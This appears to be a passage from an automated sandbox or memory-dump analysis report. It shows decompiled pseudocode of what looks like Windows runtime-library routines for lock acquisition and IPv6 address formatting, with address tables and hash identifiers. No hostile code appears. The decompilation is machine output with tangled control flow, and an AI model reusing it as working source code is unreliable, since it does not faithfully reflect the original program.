                                                                                                                                                                                    								}
                                                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                    									_push(_t51);
                                                                                                                                                                                    									E00883915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                                                    									asm("int3");
                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                    										L32:
                                                                                                                                                                                    										__eflags = _a8;
                                                                                                                                                                                    										if(_a8 == 0) {
                                                                                                                                                                                    											break;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                    										_t119 = _t96 + 0x24;
                                                                                                                                                                                    										_t107 = 1;
                                                                                                                                                                                    										asm("lock xadd [eax], ecx");
                                                                                                                                                                                    										_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                    										_a4 = _t56;
                                                                                                                                                                                    										__eflags = _t56;
                                                                                                                                                                                    										if(_t56 != 0) {
                                                                                                                                                                                    											L40:
                                                                                                                                                                                    											_t128 = 0;
                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                    												asm("sbb esi, esi");
                                                                                                                                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009201c0;
                                                                                                                                                                                    												_push(_t138);
                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                    												_t58 = E0083F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                                                    												__eflags = _t58 - 0x102;
                                                                                                                                                                                    												if(_t58 != 0x102) {
                                                                                                                                                                                    													break;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_t107 =  *(_t138 + 4);
                                                                                                                                                                                    												_t125 =  *_t138;
                                                                                                                                                                                    												_t75 = E00884FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                                                    												_push(_t125);
                                                                                                                                                                                    												_push(_t75);
                                                                                                                                                                                    												E00893F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                                                    												E00893F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                    												_t128 = _t128 + 1;
                                                                                                                                                                                    												_t159 = _t158 + 0x28;
                                                                                                                                                                                    												__eflags = _t128 - 2;
                                                                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                                                                    													E008C217A(_t107, __eflags, _t96);
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                    												_push(0x65);
                                                                                                                                                                                    												E00893F92();
                                                                                                                                                                                    												_t158 = _t159 + 0xc;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											__eflags = _t58;
                                                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                                                    												_push(_t58);
                                                                                                                                                                                    												E00883915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                                                    												asm("int3");
                                                                                                                                                                                    												_t61 =  *_t107;
                                                                                                                                                                                    												 *_t107 = 0;
                                                                                                                                                                                    												__eflags = _t61;
                                                                                                                                                                                    												if(_t61 == 0) {
                                                                                                                                                                                    													L1:
                                                                                                                                                                                    													_t63 = E00865384(_t138 + 0x24);
                                                                                                                                                                                    													if(_t63 != 0) {
                                                                                                                                                                                    														goto L52;
                                                                                                                                                                                    													} else {
                                                                                                                                                                                    														goto L2;
                                                                                                                                                                                    													}
                                                                                                                                                                                    												} else {
                                                                                                                                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                                                    													_push( &_a4);
                                                                                                                                                                                    													_push(_t61);
                                                                                                                                                                                    													_t70 = E0083F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                                                    													__eflags = _t70;
                                                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                                                    														goto L1;
                                                                                                                                                                                    													} else {
                                                                                                                                                                                    														_push(_t70);
                                                                                                                                                                                    														E00883915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                                    														L52:
                                                                                                                                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                    														_push( &_a4);
                                                                                                                                                                                    														_push(1);
                                                                                                                                                                                    														_t63 = E0083F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                    														__eflags = _t63;
                                                                                                                                                                                    														if(__eflags >= 0) {
                                                                                                                                                                                    															L2:
                                                                                                                                                                                    															return _t63;
                                                                                                                                                                                    														} else {
                                                                                                                                                                                    															_push(_t63);
                                                                                                                                                                                    															E00883915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                    															_push( &_a4);
                                                                                                                                                                                    															_push(1);
                                                                                                                                                                                    															_t63 = E0083F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                    															__eflags = _t63;
                                                                                                                                                                                    															if(__eflags >= 0) {
                                                                                                                                                                                    																goto L2;
                                                                                                                                                                                    															} else {
                                                                                                                                                                                    																_push(_t63);
                                                                                                                                                                                    																_t66 = E00883915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                    																asm("int3");
                                                                                                                                                                                    																while(1) {
                                                                                                                                                                                    																	_t110 = _t66;
                                                                                                                                                                                    																	__eflags = _t66 - 1;
                                                                                                                                                                                    																	if(_t66 != 1) {
                                                                                                                                                                                    																		break;
                                                                                                                                                                                    																	}
                                                                                                                                                                                    																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                                    																	_t66 = _t110;
                                                                                                                                                                                    																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                    																	__eflags = _t66 - _t110;
                                                                                                                                                                                    																	if(_t66 != _t110) {
                                                                                                                                                                                    																		continue;
                                                                                                                                                                                    																	} else {
                                                                                                                                                                                    																		_t67 =  *[fs:0x18];
                                                                                                                                                                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                                    																		return _t67;
                                                                                                                                                                                    																	}
                                                                                                                                                                                    																	goto L59;
                                                                                                                                                                                    																}
                                                                                                                                                                                    																E00865329(_t110, _t138);
                                                                                                                                                                                    																_t69 = E008653A5(_t138, 1);
                                                                                                                                                                                    																return _t69;
                                                                                                                                                                                    															}
                                                                                                                                                                                    														}
                                                                                                                                                                                    													}
                                                                                                                                                                                    												}
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                    												goto L3;
                                                                                                                                                                                    											}
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_t107 =  *_t119;
                                                                                                                                                                                    											__eflags = _t107;
                                                                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                    													_t81 = _t107;
                                                                                                                                                                                    													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                    													__eflags = _t81 - _t107;
                                                                                                                                                                                    													if(_t81 == _t107) {
                                                                                                                                                                                    														break;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													_t107 = _t81;
                                                                                                                                                                                    													__eflags = _t81;
                                                                                                                                                                                    													if(_t81 > 0) {
                                                                                                                                                                                    														continue;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													break;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_t56 = _a4;
                                                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                    													L3:
                                                                                                                                                                                    													__eflags = _t56;
                                                                                                                                                                                    													if(_t56 != 0) {
                                                                                                                                                                                    														goto L32;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                                    													_t56 = 0;
                                                                                                                                                                                    													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                    													__eflags = 0;
                                                                                                                                                                                    													if(0 != 0) {
                                                                                                                                                                                    														continue;
                                                                                                                                                                                    													} else {
                                                                                                                                                                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                    														return 1;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													goto L59;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												continue;
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												goto L40;
                                                                                                                                                                                    											}
                                                                                                                                                                                    										}
                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                    									return 0;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t106 =  *_t49;
                                                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                    										_t93 = _t106;
                                                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                    										__eflags = _t93 - _t106;
                                                                                                                                                                                    										if(_t93 == _t106) {
                                                                                                                                                                                    											break;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_t106 = _t93;
                                                                                                                                                                                    										__eflags = _t93;
                                                                                                                                                                                    										if(_t93 > 0) {
                                                                                                                                                                                    											continue;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									__eflags = _t106;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L59;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t84 = _t115;
                                                                                                                                                                                    					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                    					__eflags = _t84 - _t115;
                                                                                                                                                                                    					if(_t84 != _t115) {
                                                                                                                                                                                    						_t115 = _t84;
                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L59:
                                                                                                                                                                                    			}




































                                                                                                                                                                                    0x0088055a
                                                                                                                                                                                    0x0088055d
                                                                                                                                                                                    0x00880563
                                                                                                                                                                                    0x00880566
                                                                                                                                                                                    0x008805d8
                                                                                                                                                                                    0x008805e2
                                                                                                                                                                                    0x008805e5
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008805e7
                                                                                                                                                                                    0x008805e7
                                                                                                                                                                                    0x008805ea
                                                                                                                                                                                    0x008805f3
                                                                                                                                                                                    0x008805f3
                                                                                                                                                                                    0x00880568
                                                                                                                                                                                    0x00880568
                                                                                                                                                                                    0x00880568
                                                                                                                                                                                    0x00880569
                                                                                                                                                                                    0x00880569
                                                                                                                                                                                    0x00880569
                                                                                                                                                                                    0x0088056b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a217f
                                                                                                                                                                                    0x008a2183
                                                                                                                                                                                    0x008a225b
                                                                                                                                                                                    0x008a225f
                                                                                                                                                                                    0x008a2189
                                                                                                                                                                                    0x008a218c
                                                                                                                                                                                    0x008a218f
                                                                                                                                                                                    0x008a2194
                                                                                                                                                                                    0x008a2199
                                                                                                                                                                                    0x008a219d
                                                                                                                                                                                    0x008a21a0
                                                                                                                                                                                    0x008a21a2
                                                                                                                                                                                    0x008a21ce
                                                                                                                                                                                    0x008a21ce
                                                                                                                                                                                    0x008a21ce
                                                                                                                                                                                    0x008a21d0
                                                                                                                                                                                    0x008a21d6
                                                                                                                                                                                    0x008a21de
                                                                                                                                                                                    0x008a21e2
                                                                                                                                                                                    0x008a21e8
                                                                                                                                                                                    0x008a21e9
                                                                                                                                                                                    0x008a21ec
                                                                                                                                                                                    0x008a21f1
                                                                                                                                                                                    0x008a21f6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a21f8
                                                                                                                                                                                    0x008a21fb
                                                                                                                                                                                    0x008a2206
                                                                                                                                                                                    0x008a220b
                                                                                                                                                                                    0x008a220c
                                                                                                                                                                                    0x008a2217
                                                                                                                                                                                    0x008a2226
                                                                                                                                                                                    0x008a222b
                                                                                                                                                                                    0x008a222c
                                                                                                                                                                                    0x008a222f
                                                                                                                                                                                    0x008a2232
                                                                                                                                                                                    0x008a2235
                                                                                                                                                                                    0x008a2235
                                                                                                                                                                                    0x008a223a
                                                                                                                                                                                    0x008a223f
                                                                                                                                                                                    0x008a2241
                                                                                                                                                                                    0x008a2243
                                                                                                                                                                                    0x008a2248
                                                                                                                                                                                    0x008a2248
                                                                                                                                                                                    0x008a224d
                                                                                                                                                                                    0x008a224f
                                                                                                                                                                                    0x008a2262
                                                                                                                                                                                    0x008a2263
                                                                                                                                                                                    0x008a2268
                                                                                                                                                                                    0x008a2269
                                                                                                                                                                                    0x008a2269
                                                                                                                                                                                    0x008a2269
                                                                                                                                                                                    0x008a226d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2276
                                                                                                                                                                                    0x008a2279
                                                                                                                                                                                    0x008a227e
                                                                                                                                                                                    0x008a2283
                                                                                                                                                                                    0x008a2287
                                                                                                                                                                                    0x008a228a
                                                                                                                                                                                    0x008a228d
                                                                                                                                                                                    0x008a228f
                                                                                                                                                                                    0x008a22bc
                                                                                                                                                                                    0x008a22bc
                                                                                                                                                                                    0x008a22bc
                                                                                                                                                                                    0x008a22be
                                                                                                                                                                                    0x008a22c4
                                                                                                                                                                                    0x008a22cc
                                                                                                                                                                                    0x008a22d0
                                                                                                                                                                                    0x008a22d6
                                                                                                                                                                                    0x008a22d7
                                                                                                                                                                                    0x008a22da
                                                                                                                                                                                    0x008a22df
                                                                                                                                                                                    0x008a22e4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22e6
                                                                                                                                                                                    0x008a22e9
                                                                                                                                                                                    0x008a22f4
                                                                                                                                                                                    0x008a22f9
                                                                                                                                                                                    0x008a22fa
                                                                                                                                                                                    0x008a2305
                                                                                                                                                                                    0x008a2314
                                                                                                                                                                                    0x008a2319
                                                                                                                                                                                    0x008a231a
                                                                                                                                                                                    0x008a231d
                                                                                                                                                                                    0x008a2320
                                                                                                                                                                                    0x008a2323
                                                                                                                                                                                    0x008a2323
                                                                                                                                                                                    0x008a2328
                                                                                                                                                                                    0x008a232d
                                                                                                                                                                                    0x008a232f
                                                                                                                                                                                    0x008a2331
                                                                                                                                                                                    0x008a2336
                                                                                                                                                                                    0x008a2336
                                                                                                                                                                                    0x008a233b
                                                                                                                                                                                    0x008a233d
                                                                                                                                                                                    0x008a2350
                                                                                                                                                                                    0x008a2351
                                                                                                                                                                                    0x008a2356
                                                                                                                                                                                    0x008a2359
                                                                                                                                                                                    0x008a2359
                                                                                                                                                                                    0x008a235b
                                                                                                                                                                                    0x008a235d
                                                                                                                                                                                    0x00865367
                                                                                                                                                                                    0x0086536b
                                                                                                                                                                                    0x00865372
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2363
                                                                                                                                                                                    0x008a2363
                                                                                                                                                                                    0x008a2369
                                                                                                                                                                                    0x008a236a
                                                                                                                                                                                    0x008a236c
                                                                                                                                                                                    0x008a2371
                                                                                                                                                                                    0x008a2373
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2379
                                                                                                                                                                                    0x008a2379
                                                                                                                                                                                    0x008a237a
                                                                                                                                                                                    0x008a237f
                                                                                                                                                                                    0x008a237f
                                                                                                                                                                                    0x008a2385
                                                                                                                                                                                    0x008a2386
                                                                                                                                                                                    0x008a2389
                                                                                                                                                                                    0x008a238e
                                                                                                                                                                                    0x008a2390
                                                                                                                                                                                    0x00865378
                                                                                                                                                                                    0x0086537c
                                                                                                                                                                                    0x008a2396
                                                                                                                                                                                    0x008a2396
                                                                                                                                                                                    0x008a2397
                                                                                                                                                                                    0x008a239c
                                                                                                                                                                                    0x008a23a2
                                                                                                                                                                                    0x008a23a3
                                                                                                                                                                                    0x008a23a6
                                                                                                                                                                                    0x008a23ab
                                                                                                                                                                                    0x008a23ad
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a23b3
                                                                                                                                                                                    0x008a23b3
                                                                                                                                                                                    0x008a23b4
                                                                                                                                                                                    0x008a23b9
                                                                                                                                                                                    0x008a23ba
                                                                                                                                                                                    0x008a23ba
                                                                                                                                                                                    0x008a23bc
                                                                                                                                                                                    0x008a23bf
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00899153
                                                                                                                                                                                    0x00899158
                                                                                                                                                                                    0x0089915a
                                                                                                                                                                                    0x0089915e
                                                                                                                                                                                    0x00899160
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00899166
                                                                                                                                                                                    0x00899166
                                                                                                                                                                                    0x00899171
                                                                                                                                                                                    0x00899176
                                                                                                                                                                                    0x00899176
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00899160
                                                                                                                                                                                    0x008a23c6
                                                                                                                                                                                    0x008a23ce
                                                                                                                                                                                    0x008a23d7
                                                                                                                                                                                    0x008a23d7
                                                                                                                                                                                    0x008a23ad
                                                                                                                                                                                    0x008a2390
                                                                                                                                                                                    0x008a2373
                                                                                                                                                                                    0x008a233f
                                                                                                                                                                                    0x008a233f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a233f
                                                                                                                                                                                    0x008a2291
                                                                                                                                                                                    0x008a2291
                                                                                                                                                                                    0x008a2293
                                                                                                                                                                                    0x008a2295
                                                                                                                                                                                    0x008a229a
                                                                                                                                                                                    0x008a22a1
                                                                                                                                                                                    0x008a22a3
                                                                                                                                                                                    0x008a22a7
                                                                                                                                                                                    0x008a22a9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22ab
                                                                                                                                                                                    0x008a22ad
                                                                                                                                                                                    0x008a22af
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22af
                                                                                                                                                                                    0x008a22b1
                                                                                                                                                                                    0x008a22b4
                                                                                                                                                                                    0x008a22b4
                                                                                                                                                                                    0x008a22b6
                                                                                                                                                                                    0x008653be
                                                                                                                                                                                    0x008653be
                                                                                                                                                                                    0x008653be
                                                                                                                                                                                    0x008653c0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008653cb
                                                                                                                                                                                    0x008653ce
                                                                                                                                                                                    0x008653d0
                                                                                                                                                                                    0x008653d4
                                                                                                                                                                                    0x008653d6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008653d8
                                                                                                                                                                                    0x008653e3
                                                                                                                                                                                    0x008653ea
                                                                                                                                                                                    0x008653ea
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008653d6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22b6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a228f
                                                                                                                                                                                    0x008a2349
                                                                                                                                                                                    0x008a234d
                                                                                                                                                                                    0x008a2251
                                                                                                                                                                                    0x008a2251
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2251
                                                                                                                                                                                    0x008a21a4
                                                                                                                                                                                    0x008a21a4
                                                                                                                                                                                    0x008a21a6
                                                                                                                                                                                    0x008a21a8
                                                                                                                                                                                    0x008a21ac
                                                                                                                                                                                    0x008a21b6
                                                                                                                                                                                    0x008a21b8
                                                                                                                                                                                    0x008a21bc
                                                                                                                                                                                    0x008a21be
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a21c0
                                                                                                                                                                                    0x008a21c2
                                                                                                                                                                                    0x008a21c4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a21c4
                                                                                                                                                                                    0x008a21c6
                                                                                                                                                                                    0x008a21c6
                                                                                                                                                                                    0x008a21c8
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a21c8
                                                                                                                                                                                    0x008a21a2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2183
                                                                                                                                                                                    0x0088057b
                                                                                                                                                                                    0x0088057d
                                                                                                                                                                                    0x00880581
                                                                                                                                                                                    0x00880583
                                                                                                                                                                                    0x008a2178
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880589
                                                                                                                                                                                    0x0088058f
                                                                                                                                                                                    0x0088058f
                                                                                                                                                                                    0x00880583
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A2206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                                                    • Opcode ID: 586c2f2921126b620c2fd8cb6334257d80b467eeb682ff26279f5be2da092dbe
                                                                                                                                                                                    • Instruction ID: a8fd4c7e0d2ce9fb10b93c1dbdf6b3c463db8367e5eba5cb48dfccc797c8bab1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 586c2f2921126b620c2fd8cb6334257d80b467eeb682ff26279f5be2da092dbe
                                                                                                                                                                                    • Instruction Fuzzy Hash: CB513831B002156BEF24DA1CCC81F6673A9FF95720F258229FD54DB386EA35EC418BA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                    			E008814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				char _v10;
                                                                                                                                                                                    				char _v140;
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t51 = __edx;
                                                                                                                                                                                    				_t24 =  *0x922088; // 0x77746b57
                                                                                                                                                                                    				_v8 = _t24 ^ _t57;
                                                                                                                                                                                    				_t45 = _a16;
                                                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                                                    				_t52 = _a20;
                                                                                                                                                                                    				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                                    					L10:
                                                                                                                                                                                    					_t26 = 0xc000000d;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                    						if( *_t52 == _t45) {
                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						L3:
                                                                                                                                                                                    						_t28 =  &_v140;
                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                    							_push("[");
                                                                                                                                                                                    							_push(0x41);
                                                                                                                                                                                    							_push( &_v140);
                                                                                                                                                                                    							_t29 = E00877707();
                                                                                                                                                                                    							_t58 = _t58 + 0xc;
                                                                                                                                                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t54 = E008813CB(_t53, _t28);
                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                    							_t34 = E00877707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                                                    							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                    							_t40 = E00877707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                                    							_t58 = _t58 + 0x10;
                                                                                                                                                                                    							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                                    						 *_t52 = _t53;
                                                                                                                                                                                    						if( *_t52 < _t53) {
                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							E00842340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                                    							_t26 = 0;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return E0084E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                                    			}




















                                                                                                                                                                                    0x008814c0
                                                                                                                                                                                    0x008814cb
                                                                                                                                                                                    0x008814d2
                                                                                                                                                                                    0x008814d6
                                                                                                                                                                                    0x008814da
                                                                                                                                                                                    0x008814de
                                                                                                                                                                                    0x008814e3
                                                                                                                                                                                    0x0088157a
                                                                                                                                                                                    0x0088157a
                                                                                                                                                                                    0x008814f1
                                                                                                                                                                                    0x008814f3
                                                                                                                                                                                    0x008aea0f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aea15
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aea15
                                                                                                                                                                                    0x008814f9
                                                                                                                                                                                    0x008814f9
                                                                                                                                                                                    0x008814fe
                                                                                                                                                                                    0x00881504
                                                                                                                                                                                    0x008aea1a
                                                                                                                                                                                    0x008aea1f
                                                                                                                                                                                    0x008aea21
                                                                                                                                                                                    0x008aea22
                                                                                                                                                                                    0x008aea27
                                                                                                                                                                                    0x008aea2a
                                                                                                                                                                                    0x008aea2a
                                                                                                                                                                                    0x00881515
                                                                                                                                                                                    0x00881517
                                                                                                                                                                                    0x0088156d
                                                                                                                                                                                    0x00881572
                                                                                                                                                                                    0x00881575
                                                                                                                                                                                    0x00881575
                                                                                                                                                                                    0x0088151e
                                                                                                                                                                                    0x008aea50
                                                                                                                                                                                    0x008aea55
                                                                                                                                                                                    0x008aea58
                                                                                                                                                                                    0x008aea58
                                                                                                                                                                                    0x0088152e
                                                                                                                                                                                    0x00881531
                                                                                                                                                                                    0x00881533
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00881535
                                                                                                                                                                                    0x00881541
                                                                                                                                                                                    0x00881549
                                                                                                                                                                                    0x00881549
                                                                                                                                                                                    0x00881533
                                                                                                                                                                                    0x008814f3
                                                                                                                                                                                    0x00881559

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 008AEA22
                                                                                                                                                                                      • Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 0088146B
                                                                                                                                                                                      • Part of subcall function 008813CB: ___swprintf_l.LIBCMT ref: 00881490
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0088156D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
